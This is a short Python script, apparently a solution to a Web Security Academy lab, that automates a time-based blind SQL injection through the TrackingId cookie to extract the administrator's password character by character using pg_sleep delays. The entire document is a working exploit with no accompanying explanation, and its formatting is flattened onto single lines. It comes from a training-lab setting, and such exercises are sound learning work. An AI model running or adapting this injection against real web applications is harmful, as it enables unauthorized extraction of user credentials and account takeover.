1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| import requests
url='https://0a03004a034fb137c4f82c9500f4000c.web-security-academy.net/' a='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' payload_1= "'%3bselect+case+when+(username='administrator'+and+SUBSTRING(password,{},1)='{}')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users--" h={ "Host":"0a03004a034fb137c4f82c9500f4000c.web-security-academy.net", "Cookie":"session=2mfZwsZHlmyYL2mwPlK0e34AEA021iz7;TrackingId=Y7quZz53LMWRIZbA" } for num in range(20): for i in a: payload=payload_1.format(num,i) h["Cookie"]='session=w3v9123vZW4IJxuNRuqJBOJ86sbLcmNb;TrackingId=i1NjLmRNA1lXR2pZ'+payload res=requests.get(url,headers=h,timeout=1) if str(res.reason) != 'OK': print(i,end='')
|